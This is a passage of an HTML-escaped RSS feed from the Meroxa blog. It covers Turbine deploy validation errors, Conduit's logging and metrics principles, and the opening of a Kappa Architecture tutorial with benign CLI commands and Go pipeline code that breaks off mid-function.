✨ To visualize your application visit &amp;lt;https://dashboard.meroxa.io/apps/UUID/detail&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There you have it! You’ve successfully deployed from a feature branch. You can now check any downstream testing resources to see the outcomes of the changes made.&lt;/p&gt;
&lt;h2&gt;Validation errors&lt;/h2&gt;
&lt;p&gt;To protect from unintentional updates to your production data, the Meroxa Platform automatically validates resource collections referenced in your code. Here are some validation errors you may encounter as well as steps on how to resolve them.&lt;/p&gt;
&lt;h3&gt;Duplicate records validation&lt;/h3&gt;
&lt;p&gt;All destination resource collections referenced in your code are checked against Turbine data app instances already running on the Meroxa Platform. If another Turbine data app uses the same destination resource collection, the deployment process will be flagged by our validation. This is intended to prevent accidental record duplication in downstream resources:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Checking for uncommitted changes...    ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
Preparing application &quot;users-transform&quot; (javascript) for deployment...
  ✔ Application built!
  x Resource availability check failed
Error: ⚠️ Application resource &quot;pg_user&quot; with collection &quot;orders&quot; cannot be used as a destination. It is also being used as a destination by another application &quot;users&quot;.
    
Please modify your Turbine data application code. Then run `meroxa app deploy` again. To skip collection validation, run `meroxa app deploy --skip-collection-validation`.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Looping validation&lt;/h3&gt;
&lt;p&gt;If a data app references a source resource collection that is the same as the destination resource collection in the Turbine code, the deploy process fails with an error. This validation prevents accidental looping within a single Turbine data app; it does not detect loops across multiple apps within an account.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Checking for uncommitted changes...
  ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
  Preparing application &quot;users-transform&quot; (javascript) for deployment...
  ✔ Application built!
  x Resource availability check failed
Error: ⚠️ Application resource &quot;pg_users&quot; with collection &quot;orders&quot; cannot be used as a destination. It is also the source.

Please modify your Turbine data application code. Then run `meroxa app deploy` again. To skip collection validation, run `meroxa app deploy --skip-collection-validation`.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is an example of how this may manifest in your code:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
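&lt;p&gt;To clear this validation, read and write against different resource collections. A sketch of the same app with a distinct destination (the &lt;code class=&quot;language-text&quot;&gt;pg_analytics&lt;/code&gt; resource and &lt;code class=&quot;language-text&quot;&gt;orders_enriched&lt;/code&gt; collection are illustrative names, not ones from this post):&lt;/p&gt;

```javascript
// Same shape as the failing example, but the destination resource and
// collection differ from the source, so the looping validation passes.
// "pg_analytics" and "orders_enriched" are illustrative names. In a
// Turbine app this class would be assigned to exports.App.
class App {
  async run(turbine) {
    let source = await turbine.resources("pg_users");
    let records = await source.records("orders");
    let destination = await turbine.resources("pg_analytics");
    await destination.write(records, "orders_enriched");
  }
}
```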
&lt;h3&gt;Skip collection validation&lt;/h3&gt;
&lt;p&gt;There are some cases where you would want to bypass the above validations and deploy the application. For these scenarios, you can run &lt;code class=&quot;language-text&quot;&gt;meroxa app deploy --skip-collection-validation&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Have questions or feedback?&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;joining our community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We can’t wait to see what you build! 🚀&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Log & Metric Experiences Matter for Streaming Data]]></title><description><![CDATA[The opportunity to delight someone using your tool can happen at any time. The open-source Conduit project team makes the user experience a top priority.]]></description><link>https://meroxa.com/blog/log-metric-experiences-matter-for-streaming-data</link><guid isPermaLink="false">https://meroxa.com/blog/log-metric-experiences-matter-for-streaming-data</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 06 Sep 2022 16:35:54 GMT</pubDate><content:encoded>&lt;p&gt;Conduit is an open-source project that will help you stream data from any of your production data stores to the places where you need it in your infrastructure. This post is about the principles around Conduit’s logging and metrics capabilities and why these principles are better for developers when moving data into systems like Apache Kafka.&lt;/p&gt;
&lt;p&gt;The opportunity to delight someone using your tool can happen at any time. While fancy web UIs or mobile apps tend to get the limelight, developer experience can apply to even the most mundane needs: logging and metrics. I’ll use logging and metrics somewhat interchangeably throughout this post, but where the difference matters, I’ll make sure to call that out.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Principles&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Send everything to the same place. Create consistency and reduce the decision overhead.&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building connectors in Conduit is fairly straightforward. We made it easy for any developer who wants to build a connector to do so without tightly coupling their work to Conduit itself. (I highly recommend you read our post on &lt;a href=&quot;https://meroxa.com/blog/how-conduit-uses-buf-to-work-with-protobuf&quot;&gt;how we use Buf to make that experience possible&lt;/a&gt;.) One of the main benefits of loose coupling is that a developer can build a connector at their own pace in a separate repository. This can also lead to some drawbacks. The main one is that a connector can create its own experiences, decoupled from the main Conduit experience. In the Kafka Connect ecosystem, you can see how this plays out: logs from the connectors can be emitted anywhere they choose, and you’re required to set any logging configuration on a per-connector basis.&lt;/p&gt;
&lt;p&gt;Conduit encourages good connector logging experiences from the get-go via the Conduit Connector SDK. The SDK has the facilities for logging built in. Arguably, a connector developer could try to emit logs to a place they choose and then use the Conduit Connector Configuration to control it, but that would require more effort than going down the happy path.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/_dxBl10BfLjpfVlcY82OHh3fMQ9u-GcIjIpzxB-ZWX1LXtVgxV9JP1ZiZVc56svV09ctkvpespj9ryC-LNrg7oNzbsQnr6m0TMCHt2-hyXkaYm5qPBLTCfAn1XP2n1ieY3YmP2YpBckOL2t-ah1zSmQ&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;The Conduit Connector SDK can also bring structure to what’s being emitted on each of the log lines. Every log line will always have the same set of information in the same order. Structure and consistency are super important because developers can come to rely on the information always having the same shape. Without consistency, implicit behaviors exist within systems. Implicit behaviors in a system result in frustration for developers because work will need to be done to build around them if they’re not fully documented.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/m6-jpu5jC-CleU9YbMI0QdOedECD9b7BGEnnYq-VSJXR1w5QI4hFpSGz0hQuee2YNmyRR524rNBJhWPsz8G17pfoEsTHoSxTC76NFSMldmWHQibTEmeZUcdNhbGEi9-Ji9E8TJh_4KKDJcTSbDW-xMA&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit is even bringing this experience to Kafka Connect Connectors themselves! Conduit can run Kafka Connect Connectors via the wrapper we built, and we recognize how logging can be a pain. We’re &lt;a href=&quot;https://github.com/ConduitIO/conduit-kafka-connect-wrapper/issues/56&quot;&gt;actively working on a fix&lt;/a&gt; so that your Kafka Connect Connectors can emit their logs to the same place as the Conduit logs. No extra work needed!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;What are you asking the developer or operator to learn?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;One of the biggest gripes is being forced to use another tool to understand the tool that you’re supposedly trying to operate. In development, having to use another tool can be a deal breaker. In Conduit, if something needs to be communicated to the developer, we do it via the logs including the metrics. You might conclude that the Conduit logs could be overly verbose but this is where log levels are critical. The Conduit Connector SDK has facilities for marking logs at many different levels courtesy of the &lt;a href=&quot;https://github.com/rs/zerolog&quot;&gt;Zerolog package&lt;/a&gt; in Go. As the user of Conduit, you can then filter out various levels based on your needs. The benefit of all of this is that it’s text-based and any developer coming from any programming language ecosystem can quickly get the information they need to debug what’s happening.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/wegPILtBrz-DS9USEj6NvImlp5NoBBVImqf_WvhZYqyKbXgtMPPUZGgR83PeNfvJ_TW0KTNCBCbh1uXyytq-B60CKB3ozhY2GtV2MQn0KqBmhPD8Q_nCoXYiYRdXoDS2_pbdGP5TU09O59dI2Hz5E4A&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;One of the biggest gripes the Conduit team hears from developers about Kafka Connect is that they have to use JMX to understand what’s happening under the hood. We don’t hear this from developers with Java backgrounds; it comes from developers whose primary language isn’t Java (e.g. JavaScript, Python, Go). Arguably, this disincentivizes developers from these other language ecosystems. From a Conduit perspective, all the metrics for what’s happening under the hood are emitted at a metrics endpoint (e.g. &lt;code class=&quot;language-text&quot;&gt;/metrics&lt;/code&gt;). Nothing fancy is needed beyond using &lt;code class=&quot;language-text&quot;&gt;curl&lt;/code&gt; in your terminal or a web browser. The benefit of this approach is that the developer can quickly see what’s happening on their own machine, while the same endpoint can be used to connect to data collection tools like Prometheus or Datadog.&lt;/p&gt;
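&lt;p&gt;Because the metrics endpoint serves plain text in the Prometheus exposition format, it is easy to post-process in any language. A small sketch that filters metric lines by name prefix (the sample payload below is made up for illustration, not actual Conduit output):&lt;/p&gt;

```javascript
// Filter Prometheus-style text metrics by name prefix, skipping comment
// lines. The sample payload is illustrative; real output would come from
// fetching the /metrics endpoint.
function filterMetrics(payload, prefix) {
  return payload
    .split("\n")
    .filter((line) => line.startsWith(prefix) && !line.startsWith("#"));
}

const sample = [
  "# HELP conduit_pipelines Number of pipelines by status.",
  'conduit_pipelines{status="running"} 2',
  "go_goroutines 14",
].join("\n");

console.log(filterMetrics(sample, "conduit_"));
// [ 'conduit_pipelines{status="running"} 2' ]
```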
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/koCNMeCBllplpVadJ_5RbPuiMrUScz2Hm1-1_LkXIHETyGo_tKGtiT9g9Ulec_ZA-guaRhul1HgrrNYwiW3oFt4GYTPQvJtG9uJ5cb5p01YlX54SytwSeMhe986Yi_l7gybMoz7zU0JfMOAnjIM0P1U&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Principles Matter for Backend Systems&lt;/h2&gt;
&lt;p&gt;The principles outlined in this blog post are just a few of those the Conduit team abides by, shown here as applied specifically to metrics and logs. Principles are important because they improve decision-making, not only for the team but also for how we guide open-source contributions in the community. Principles also ensure consistency in the product experience across the board.&lt;/p&gt;
&lt;p&gt;Give &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; a try! If you like what you see, follow us on Twitter &lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;@conduitIO&lt;/a&gt; or join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; to share your experiences and how we could make it better.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Analytics Using the Kappa Architecture in ~20 Lines of Code with Turbine, Materialize, Spark, & S3]]></title><description><![CDATA[Real-Time Analytics Using the Kappa Architecture in ~20 Lines of Code with Turbine, Materialize, Spark, & S3.]]></description><link>https://meroxa.com/blog/real-time-analytics-using-the-kappa-architecture-in-20-lines-of-code</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-analytics-using-the-kappa-architecture-in-20-lines-of-code</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 01 Sep 2022 20:24:55 GMT</pubDate><content:encoded>&lt;p&gt;In 2014, Jay Kreps &lt;a href=&quot;https://www.oreilly.com/radar/questioning-the-lambda-architecture/&quot;&gt;wrote a blog post&lt;/a&gt; detailing the Kappa Architecture as a way to simplify the existing Hadoop based architecture for processing data. The Kappa Architecture, as seen in the below diagram, leverages a streaming service like Apache Kafka to be the main source of data removing the need to store data into a filesystem like HDFS for batched based processing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Kappa%20Architecture%20Blog%20Post_Image%201.png&quot; alt=&quot;Kappa Architecture Blog Post_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;While the benefits of the Kappa Architecture are numerous, operating and maintaining the various infrastructure components for ingestion, streaming, stream processing, and storage is no trivial task. The Meroxa platform and our Turbine SDK make it trivial to deploy and leverage the Kappa Architecture shown in the diagram below in as few as 20 lines of code.&lt;/p&gt;
&lt;h2&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Kappa%20Architecture%20Blog%20Post_Image%202.png&quot; alt=&quot;Kappa Architecture Blog Post_Image 2&quot;&gt;Show Me the Code!&lt;/h2&gt;
&lt;p&gt;We’re going to bring the above diagram to life with Meroxa’s &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go&quot;&gt;Turbine Go SDK&lt;/a&gt;. Turbine currently supports writing data applications in Go, Python, and JavaScript with more languages coming soon.&lt;/p&gt;
&lt;h3&gt;Turbine Data App Requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://go.dev/dl/&quot;&gt;Go&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.16095230.999997172.1661745054-1008543787.1661745054&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/?_gl=1*1pqqhw8*_ga*MTQzMDY4NDQwOS4xNjg5MDE2ODM0*_ga_3T4DL01QGS*MTY5MzMyMjE3OS40My4xLjE2OTMzMjI2OTIuNTcuMC4w&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/?_ga=2.16095230.999997172.1661745054-1008543787.1661745054&amp;#x26;_gl=1*1thrann*_ga*NzE4NDE5MjU3LjE2NTkzMzcwOTk.*_ga_3T4DL01QGS*MTY2MTc0NTA1Mi4yNi4xLjE2NjE3NDUwNTMuMC4wLjA.&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://aws.amazon.com/s3/&quot;&gt;Amazon S3&lt;/a&gt; Bucket&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://materialize.com/docs/install/&quot;&gt;Materialize&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://spark.apache.org/&quot;&gt;Apache Spark&lt;/a&gt; (OSS) or &lt;a href=&quot;https://www.databricks.com/&quot;&gt;Databricks&lt;/a&gt; (Paid)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Adding PostgreSQL, S3, and Materialize Resources to the Data Catalog with the Meroxa CLI&lt;/h3&gt;
&lt;p&gt;The first step in creating a data app is to add the S3 and PostgreSQL resources to the Meroxa catalog. Resources can be added via the dashboard, but we’ll show you how to add them to the catalog via the CLI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adding PostgreSQL (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \
  --url &quot;postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB&quot; \
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If your database supports &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/connection-types/logical-replication&quot;&gt;logical replication&lt;/a&gt;, set the metadata configuration value to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adding S3 (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create dl &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type s3 \
  --url &quot;s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Adding Materialize (&lt;/strong&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-materialize&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Materialize is &lt;strong&gt;wire-compatible&lt;/strong&gt; with PostgreSQL, which means we can use the standard connection string format.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create mz_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type materialize \
  --url &quot;postgres://$PG_USER@$PG_URL:$PG_PORT/$PG_DB&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Initializing a Turbine Go Data App&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init pg_kappa &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; go  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When initializing the Turbine app, you’ll see we include many comments and boilerplate to help you get up and going. We removed most of this for this example, but take a look around and even execute &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt; to see the output of our sample app.&lt;/p&gt;
&lt;h3&gt;Creating the Kappa Architecture with Turbine&lt;/h3&gt;
&lt;p&gt;Inside the main App, we ingest data from our PostgreSQL DB (pg_db) and orchestrate it in real time to our destinations, Materialize (mz_db) and AWS S3 (dl), as seen in the code block below. We’ll take data from the &lt;code class=&quot;language-text&quot;&gt;orders&lt;/code&gt; table using &lt;a href=&quot;https://en.wikipedia.org/wiki/Change_data_capture&quot;&gt;change data capture (CDC)&lt;/a&gt;. Every time there is a change in the PostgreSQL source, our Turbine data app will keep our destinations in sync.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// create connection to Postgres db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// ingest data from orders table&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    materialize&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mz_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// create connection to Materialize db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    datalake&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;dl&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// create connection to AWS S3 data lake&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
